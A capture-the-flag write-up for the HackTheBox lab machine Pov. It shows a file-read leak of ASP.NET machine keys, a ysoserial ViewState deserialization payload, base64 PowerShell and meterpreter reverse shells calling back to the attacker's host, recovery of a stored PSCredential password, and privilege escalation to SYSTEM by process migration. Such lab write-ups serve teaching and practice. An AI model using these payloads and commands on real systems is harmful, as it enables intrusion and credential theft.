HackTheBox Pov
Writeup for HackTheBox Pov
Machine Synopsis
Pov is a medium Windows machine that starts with a webpage featuring a business site. Enumerating the initial webpage, an attacker is able to find the subdomain dev.pov.htb. Navigating to the newly discovered subdomain, a download option is vulnerable to remote file read, giving an attacker the means to get valuable information from the web.config file. The subdomain uses the ViewState mechanism, which, in combination with the secrets leaked from the web.config file, is vulnerable to insecure deserialization, leading to remote code execution as the user sfitz. Looking at the remote filesystem, an attacker can discover and manipulate a file that reveals the credentials for the user alaading. Once the attacker has code execution as the user alaading the SeDebugPrivilege is abused to gain code execution in the context of a privileged application, ultimately resulting in code execution as nt authority\system. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ nmap -p- --min-rate 10000 10.10.11.251
PORT STATE SERVICE
80/tcp open http
❯ nmap -p 80 -sCV 10.10.11.251
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: pov.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
❯ echo -e '10.10.11.251\t\tpov.htb' | sudo tee -a /etc/hosts
10.10.11.251 pov.htb
Lets check out the webpage.
There seems to be nothing much interesting. Lets fuzz for any possible subdomains.
1
2
3
4
❯ ffuf -u http://pov.htb -H "Host: FUZZ.pov.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -ac
...
dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 462ms]
...
dev subdomain found. Add dev.pov.htb to /etc/hosts as well.
Browsing around the webpage, we can notice that the word ASP.NET has been bolded in a few different instances. This could be some hints (?)
Before we check out this function, lets check for any interesting directories.
1
2
3
4
5
❯ feroxbuster -u http://dev.pov.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x aspx
<nothing> interesting>
❯ feroxbuster -u http://dev.pov.htb/portfolio -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x aspx
<nothing interesting too>
Ok lets check out the Download CV function on Burp Suite.
Exploitation
From the Burp request, we can observe that there is a ViewState and file parameter. Lets try to check for local file inclusion.
It looks like we can grab other files on the web server. Lets try grabbing a Windows file.
Googling for aspx config file reveals that there is a web.config file and it must be present at the content root path (typically the app base path) of the deployed app. Lets try to grab this file.
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
Analyzing the web.config file, we have some decryptionKey and validationKey which might be useful to us.
HackTricks explains that we may be able to exploit ASP.NET ViewState parameter using ysoserial.
Download the ysoserial file from GitHub to local Windows machine.
Use the following ysoserial command to generate the malicious ViewState.
1
2
3
PS> ./ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio" -c "ping 10.10.16.5"
XFouSlPUrt2U3BGCUd5YEK90pJE4EWKqhze20bRjoOAwBfCFUri%2FsEBtSkaF10LFeNKF4wGyXcVkgi3MkSuQ4%2BmItDgNR1tTrT8tecr5pSRUeEsj1akHzq9Zeo5ZZGFIK9zaylqI%2BUIlO3vd1XvBPWReixWtLmofGrY8e%2FJndzicdaDj9iQPYlRlrcpzBeSqYLw8c3b%2Bwnk1MOxfUqAIKKcDEy7P%2F9FhskOrydZr7v5e0cUfmsSKCnNcuwy32LxHj78CSXo%2Fb2h6eB9Js4E4KKKt79zkq%2ByqrgzelI6FbGzg7zM7Qp1o7K6BwHrawrucCCJxXe%2BrTjJjCmKdVi2ktUdXwqxqwu7ymXV2NhpjFdyMfFVel5PSXuARlLBEiZsOBiVL6ipKGjLizQZ%2FdAekl5I%2BMndD0zyhaCIFCFqEF2W5D30dRaILSkoOhKdOC0y53KhwFZJEKv3tWEfo6KMAprHAiQITQ7wyEV9S79HdLxDP0d3PQJ1mTSZXGcM%2B4mMl%2F2dHjLF%2FwRZMX8YfcPpQ5yk25sW%2B3bfpvJh%2Bo4DgSFZX0EebfPXNufrbasH0crXm7ZJJQjObfAyIOIIUYk6tO4vDjWW1dT%2Fdn8y9yb80MKgUUIdPtM4s%2BWTIYasVnV%2FLIowvwYbCJtjvZ9Uhkosk3yCL9ui%2FWWhTr2VtBH6t2cNraD9FwbRgoRDMiBqQhJUrzwowQfdxIwA%2BMrcLNqNMcKzzDXk%2FOUKsgkpymHoQKaReAssh30SqqLD91lelT4D4nmfsp1rO7DvIyGqxzYPgOi1KjZ1hbKHZ%2Bsbmwt3SCn1jR%2Bumo%2FSvl7gXXtB1pHkksHTm6rcmMu6saUAxh5RPjO60KRDoPwlis%2FxXSdFCDYUjvgg%2FKeuSGmsGZIxTxnD8E7WQA9JvFcxim847HcnPi75HuD395dDcyBeukGXNF2mVple2wIVTOUaMBYn7WKRelkVlyWY%2BA92qtDYFuI7xgl3O58NR9mgyNWhNLwz30WiRtY0cSTbJCPI1KJ234axEvCOvHAv%2FSSyxpp3G9Id2aUZk5m2MDsGLF%2FeJ%2FnoGWfRALWD1YW%2FToyg%2BaYHa8oOoYTXPTmJ8vNi3vQ7sjVsBq8jRJtyp%2Ft8LwNUtksmJw5aoHlIyr%2FGo0%2BykUcv8vPpOosP2CmCu0aNzmZUZVpOEWgkKacbHjgiy4fcOeWvH8VBQzLlrNNLAO2XyJXP5nxHJF5d6w8YtYryuOuALPz4W8ejVDB6gk7OqpxvW8yiqSzOAl5tJZDQDfJfNikUDdJg1foSeFR0bb8YrzATvX31rfXUgeCu3WfUc48h51HDo4v4RIj2dIcunNJbq8zH0NeCbz5EsH9xVoEaAZbangSd5lWhhzI22HnR%2F3wy9xc0Y1BKFs7qC1x3SAkvlG3pVMBv%2Bcj4Lqo%2B3xDDwbq4d6zk2akFaF4bKly74fgJqbe7Lfh%2F4b90xXk8%2BzwmgRbE6iZenA%2BEoKcOCsT%2FUTNW3mLPZsM5Ls8d4j67rwCUPBn95mymxF%2BMYGkqMlPeAGUG1Nm1CsVw1833NgV3ZwvBiVdTa6bDTAKx08yXgYYW9chJ0BDiYXCivKySHb1ZQY%2FHqYN4lSL0XDLSSgDFVDOcS%2B6vdkHj76D%2BRPFhvOk7C2VSwg%2FRTcoV4L9oSuVF9t6p%2BwRmn8wqPtndJyQdlMPlGVN2PCkI85DqrCYWjEQeciW8luDr9Is%2FEXbevm%2FAeDCfSTvEorbzZDIMQ%2FjttUQxVa8qutePtyMAufJXKjl5S9mZKSmj8tB3nkZsEEvXnEqLeXVQphY9tmqD%2B0%2BXUgF1eKQoDqASxv%2FA45d7bfFdMCpe4hcA5AWlqgdrESfvv7%2FWX1Lk7qS82sA%3D%3D
Start tcpdump to listen for the ping requests.
1
2
3
❯ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
Replace the current ViewState request with the malicious ViewState request generated and check if the tcpdump picks up the ping request.
1
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=<new_malicious_ViewState_generated>&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=6C4nwH5nLgn%2FvYqxWAmu69Dg1X3dS8pdMwc%2BYCh3w5d9d26F%2BqEaCvzAA1fpwD4HmFG5AcRzSxfTnKKkW%2Bs%2FScRCvulE5BjJVPkQ3hzIiFMJmO5pUIMjTPfSebfyrpOG0uGw1w%3D%3D&file=..\web.config
1
2
3
4
5
6
7
8
IP pov.htb > shiro: ICMP echo request, id 1, seq 1, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 1, length 40
IP pov.htb > shiro: ICMP echo request, id 1, seq 2, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 2, length 40
IP pov.htb > shiro: ICMP echo request, id 1, seq 3, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 3, length 40
IP pov.htb > shiro: ICMP echo request, id 1, seq 4, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 4, length 40
Generate a PowerShell #3 (Base64) reverse shell payload on revshells and generate a malicious ViewState with that payload.
1
PS> ./ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio" -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAOQA5ADkAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
1
2
3
4
5
6
❯ sudo rlwrap -cAr nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.251] 49672
whoami
pov\sfitz
PS C:\windows\system32\inetsrv>
Privilege Escalation
Lets enumerate around for any interesting information.
1
2
3
4
5
6
7
8
9
10
11
PS C:\windows\system32\inetsrv> cd C:\users
PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/26/2023 4:31 PM .NET v4.5
d----- 10/26/2023 4:31 PM .NET v4.5 Classic
d----- 10/26/2023 4:21 PM Administrator
d----- 10/26/2023 4:57 PM alaading
d-r--- 10/26/2023 2:02 PM Public
d----- 12/25/2023 2:24 PM sfitz
There seems to be another user alaading. Further enumeration shows another interesting file called connection.xml in C:\users\sfitz\Documents.
PS C:\users> cd sfitz
PS C:\users\sfitz> cd Documents
PS C:\users\sfitz\Documents> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/25/2023 2:26 PM 1838 connection.xml
PS C:\users\sfitz\Documents> cat connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
This looks like a PSCredential file with an encoded password. Googling for PSCredential get password reveals this StackOverflow article on how to decode the password.
1
2
3
PS C:\users\sfitz\Documents> $cred = Import-Clixml .\connection.xml
PS C:\users\sfitz\Documents> $cred.GetNetworkCredential().password
f8gQ8fynP44ek1m3
Now that we got the password, we can try to execute commands as alaading.
1
2
3
4
5
PS C:\users\sfitz\Documents> $username = 'alaading'
PS C:\users\sfitz\Documents> $password = 'f8gQ8fynP44ek1m3'
PS C:\users\sfitz\Documents> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\users\sfitz\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
pov\alaading
Lets reuse the revshells payload we generated just now to get another reverse shell.
1
PS C:\users\sfitz\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAOQA5ADkAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=}
1
2
3
4
5
6
7
8
❯ sudo rlwrap -cAr nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.251] 49680
whoami
pov\alaading
PS C:\Users\alaading\Documents> cd ../Desktop
PS C:\Users\alaading\Desktop> cat user.txt
9792d38fe39c3a968f2b909d53d208b0
Checking the privileges of alaading reveals that he has the SeDebugPrivilege which basically allows the user to debug any process (including the SYSTEM processes).
1
2
3
4
5
6
7
8
PS C:\Users\alaading\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
However, the SeDebugPrivilege state is disabled. We can enable this by using RunasCs, which is a utility to run specific processes with different permissions than the user’s current logon provides using explicit credentials.
Lets craft a malicious exe file and also grab the RunasCs binary from GitHub.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.5 LPORT=8888 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: rev.exe
❯ wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
❯ unzip RunasCs.zip
Archive: RunasCs.zip
inflating: RunasCs.exe
inflating: RunasCs_net2.exe
❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Start the exploit handler on Metasploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.5:8888
Download rev.exe and RunasCs.exe file to the victim machine.
Thereafter, execute the rev.exe with RunasCs.exe as alaading user.
1
2
3
4
5
6
7
8
9
PS C:\Users\alaading\Documents> wget http://10.10.16.5/rev.exe -O rev.exe
PS C:\Users\alaading\Documents> wget http://10.10.16.5/RunasCs.exe -O RunasCs.exe
PS C:\Users\alaading\Documents> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/31/2025 12:17 AM 7168 rev.exe
-a---- 1/31/2025 12:24 AM 51712 RunasCs.exe
PS C:\Users\alaading\Documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 "C:\\Users\\alaading\\Documents\\rev.exe"
Check the exploit handler for the meterpreter shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.5:8888
msf6 exploit(multi/handler) > [*] Sending stage (203846 bytes) to 10.10.11.251
[*] Meterpreter session 2 opened (10.10.16.5:8888 -> 10.10.11.251:49688)
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeDebugPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > getuid
Server username: POV\alaading
Find a SYSTEM process and migrate to it. In this case, we will be migrating to winlogon.exe.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Proc
ess]
4 0 System x64 0
88 4 Registry x64 0
276 4 smss.exe x64 0
344 624 svchost.exe x64 0 C:\Windows\System32\svchost.exe
376 368 csrss.exe x64 0
476 624 svchost.exe x64 0 C:\Windows\System32\svchost.exe
480 368 wininit.exe x64 0
488 472 csrss.exe x64 1
548 472 winlogon.exe x64 1 C:\Windows\System32\winlogon.exe
...
meterpreter > migrate 548
[*] Migrating from 4420 to 548...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 940 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
bcd5f4c8c9dd3253ea8d42a251df2b88